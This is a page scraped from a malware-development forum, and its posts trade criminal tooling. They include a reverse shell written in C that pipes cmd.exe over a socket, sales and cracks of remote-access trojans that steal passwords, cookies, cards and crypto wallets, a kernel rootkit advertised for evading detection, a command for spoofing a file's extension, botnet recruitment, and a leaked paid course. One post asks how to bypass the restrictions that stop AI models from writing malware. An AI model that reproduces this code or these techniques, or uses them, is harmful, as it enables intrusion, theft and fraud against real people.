PwnForums - Malware Development

Malware On Steroids

Tue, 10 Feb 2026 19:06:22 +0000

panel of victims : https://t.me/paneltxt

null

null

PE Loader

Mon, 09 Feb 2026 08:46:21 +0000

Currently working on PE file format and loader.

Enjoy this modern loader ! Will be improved later to be evasive.

Source :
Manual PE Loader

Best tech for evasion

Sun, 08 Feb 2026 19:33:24 +0000

wassup everyone, I was just wondering, what is the best technique in terms of evasion, specifically for DLL based injections.

Reverse Shell Native

Thu, 05 Feb 2026 08:09:20 +0000

Reverse Shell Native + Bin (Win/Linux) x64

The goal was to reproduce a reverse shell with only native (NT function). No CRT, No IAT, No Winsock. The server is in C#, cross-platform enable. And reverse shell is pure C for Windows (x64) and able to reconnect if losing connection to server. It works as expected and is currently a POC. It is also possible to add evasion for syscalls and obfuscation.

Socket

The first thing to get away was Winsock API. And I find amazing articles combining last research about socket with the most low-level control possible. Under the Hood of AFD.sys Part 1: Investigating Undocumented Interfaces and Under the Hood of AFD.sys Part 2: TCP
handshake. We only need here to create a socket, bind it and connect it. Not sending or receiving data since we're gonna associate stds to socket handle.

Sub-process

The most complicated part here. It consists of creating a process using NtCreateUserProcess while redirecting std in/out/err. With a bit reversing of base code the CreateProcessA Simple Reverse Shell in C:

Quote:#define WIN32_LEAN_AND_MEAN
#define _CRT_SECURE_NO_WARNINGS
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include
#include
#include
#include
// Need to link with Ws2_32.lib
#pragma comment(lib, "ws2_32.lib")
WSADATA wsaData;
SOCKET winSock;
struct sockaddr_in sockAddr;
int port = 8081;
char* ip = "127.0.0.1";
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
int main(int argc, char* argv[]) {
int start = WSAStartup(MAKEWORD(2, 2), &wsaData);
winSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons(port);
sockAddr.sin_addr.s_addr = inet_addr(ip);
WSAConnect(winSock, (SOCKADDR*)&sockAddr, sizeof(sockAddr), NULL, NULL, NULL, NULL);
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESTDHANDLES;
sinfo.hStdError = (HANDLE)winSock;
sinfo.hStdInput = (HANDLE)winSock;
sinfo.hStdOutput = (HANDLE)winSock;
//LoadLibraryA("DllInspector.dll");
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
return 0;
}

Server

Quote:Commands:
display/list - Show all connected clients
select - Select a client
interact/shell - Enter interactive shell with selected client
server
start - Start a new server
patch
network [OPT] - Patch the reverse shell with a new endpoint to connect
exit - Exit the program

Proxy

Quote:

Src : Code
Bin : Compiled

Malware FUD easy

Tue, 03 Feb 2026 20:06:22 +0000

Hello Dear bf community i found 2 exploit (if we can call that)
u can create Any Stealer or Malware with Bun or Node JS and compile it with electron or Bun,
if u compile in electron u need to obf with https://js-confuser.com/ and https://obfuscator.io/, build time is 10 MIN and execution was very slow, but generaly 2-3/72 detection on Virustotal,
ps : use https://tria.ge/ for analyse in debug ur malware

Steaelite RAT v2 - Best Windows RAT | Fully Undetectable | FUD Remote Access Tool

Tue, 27 Jan 2026 06:49:48 +0000

✨ Steaelite RAT v2: Limitless Control and Monitoring

⭐️ Essential Capabilities:

? Reconnect: Automatically restore connections if access is lost.
? Streamlined Access: Enable Fast Access Buttons for instant control.
? Lightweight: Small, standalone executable with no dependencies.
? Wide Compatibility: Works on Windows 7 to 11 (both x86 and x64).
? Stealthy Operation: Auto Startup, Anti-double-launch, Anti-VM, Anti-debug.
? Automated Functions: Auto Stealer, Keylogger, Command Execution on first run.

⭐️ Advanced Options:

? Data Recovery & Grab: Browser Autofills, Desktop Wallets, Discord & Telegram data.
? Browser Control: Downloads, Cookies, Passwords, Credit Cards, History with decryption.
? Media & System Control: Webcamera Capture, Display Rotation, Wallpaper changing.
? File Management: Encrypt/Decrypt, Copy, Delete, Download, Upload, List files.
? Process Control: Run, List, Kill, Get Path, Manage Battery, Installed Software.
? System Actions: Shutdown, Restart, Logoff, Blue Screen of Death, Bot Gifting.
? Network & Security: Proxy Usage, Command Execution, Privilege Elevation.

Buy Now via Telegram Bot: @steaelitebot

Experience unparalleled control and efficiency with Steaelite RAT v2. Acquire your license through our convenient Telegram bot and start utilizing the most advanced remote access capabilities today!

Stealthy open-source linux rootkit

Fri, 23 Jan 2026 10:36:12 +0000

One of the best rootkits currently, hides very well for strong persistence.

Quote:Singularity is a sophisticated rootkit that operates at the kernel level, providing:
Process Hiding: Make any process completely invisible to the system

File & Directory Hiding: Conceal files using pattern matching

Network Stealth: Hide TCP/UDP connections, ports, and conntrack entries

Privilege Escalation: Signal-based instant root access

Log Sanitization: Filter kernel logs and system journals in real-time

Self-Hiding: Remove itself from module lists and system monitoring

Remote Access: ICMP-triggered reverse shell with automatic hiding

Anti-Detection: Evade eBPF-based runtime security tools (Falco, Tracee), bypass Linux Kernel Runtime Guard (LKRG), and prevent io_uring bypass attempts

Audit Evasion: Drop audit messages for hidden processes at netlink level with statistics tracking and socket inode filtering

Memory Forensics Evasion: Filter /proc/kcore, /proc/kallsyms, /proc/vmallocinfo

Cgroup Filtering: Filter hidden PIDs from cgroup.procs

Syslog Evasion: Hook do_syslog to filter klogctl() kernel ring buffer access

Debugfs Evasion: Filter output of tools like debugfs that read raw block devices

Conntrack Filtering: Hide connections from /proc/net/nf_conntrack and netlink SOCK_DIAG/NETFILTER queries

SELinux Evasion: Automatic SELinux enforcing mode bypass on ICMP trigger

LKRG Bypass: Evade Linux Kernel Runtime Guard detection mechanisms

eBPF Security Bypass: Hide processes from eBPF-based runtime security tools (Falco, Tracee)

https://github.com/MatheuZSecurity/Singularity

AI Agents for Coding Malwares

Wed, 21 Jan 2026 18:27:55 +0000

I have seen a lot of articles and post on Social Media people are using AI to code malwares like any. RansomWare, Wipers, Stealer , loader etc

I heard that people used Claude

is there any techniques to bypass the Restrictions <>???

does anyone using any AI LLM etc to code malwares ???

sharing is caring

[Rust]fun way to execute shellcode

Mon, 19 Jan 2026 11:40:45 +0000

Hidden Content

You must register or login to view this content.

execute shellcode after display turn off

XWorm v7.2 Cracked

Sun, 18 Jan 2026 19:34:41 +0000

XWorm 7.2
Windows Remote Administartion Tool, Remotely control windows and its lightweight
Features

Cracked Cleaned file
All apps included
Offline activation
All plugins
Lightweight installer

!!!! Caution !!!!
Connects to srv1387.hstgr[.]io when launched. <- LAUNCH ONLY IN VM AND BE SURE C2 IS DEAD, PROB RATTED BY ORIGINAL CRACKER

Credit: Drcrypt0r

https://github.com/Cryakl/Ultimate-RAT-C...7.2.7z.003

Malware Extension Spoofer

Tue, 13 Jan 2026 00:16:39 +0000

PowerShell script that hides the app/malware file extension by padding the filename with spaces.

This method has been covered by John Hammond on his channel and this is simply a slightly improved remake of his code

‎

Example picture:

‎ ‎

Example video:

https://sendvid.com/ml86udlc

‎

Use command:

.\extspooferps.ps1 -FilePath .\malware.exe -NewBasename "innocentfile.jpg" -NewExtension "exe"

‎ ‎

Script:

Hidden Content

You must register or login to view this content.

Crypto Monitor 1.0.0

Sun, 11 Jan 2026 15:21:58 +0000

Crypto Monitor Plugin for pulsar v2.4.5

An advanced process monitoring solution for Crypto Wallets,
enhancing the capabilities for pulsar v2.4.5

monitored wallets:
- exodus
- ledger live
- trezor suite
- guarda
- coinbase wallet
- metamask

created by

Hidden Content

You must register or login to view this content.

Botnet peer to peer

Sat, 03 Jan 2026 23:31:15 +0000

I am a c++ developer with about 7 years of experience in coding, windows and assembly. I have been developing a c++ p2p botnet that is divided in subnets in which admins handle the commands, all decentralized with cryptographic verification for verification of commands from public sources and with future command panel.
I want to find people interested in helping me and extending my network.

Maldev Academy

Sat, 03 Jan 2026 13:50:21 +0000

Advanced Training for Cyber Security Professionals

Maldev Academy provides specialized, module-based security

training and resources designed for cyber security professionals.

Contains:
- Full Course
- VM Student
- 128 modules*

Preview:

https://p.vinci-concessions.com/?49110d4322f87763#48c232xg22NFcThgspYiuJiE6WNgYxyX9Vp7xCjN1TNz

Download:

Hidden Content

You must register or login to view this content.

*:
- Modules folder contains the first ordered modules
- Samples folder contains the new modules (at the leak time)

Author: mr.d0x
Source: _https://maldevacademy.com/

LOLC2 - Collection of C2 Frameworks

Sat, 03 Jan 2026 11:58:49 +0000

LOLC2

collection of C2 frameworks that leverage legitimate services to evade detection

I highly recommend it for RT/MalwrDev, very enriching and interesting from a technical point of view.

_https://lolc2.github.io/
_https://mthcht.medium.com/c2-hiding-in-plain-sight-7a83963b9344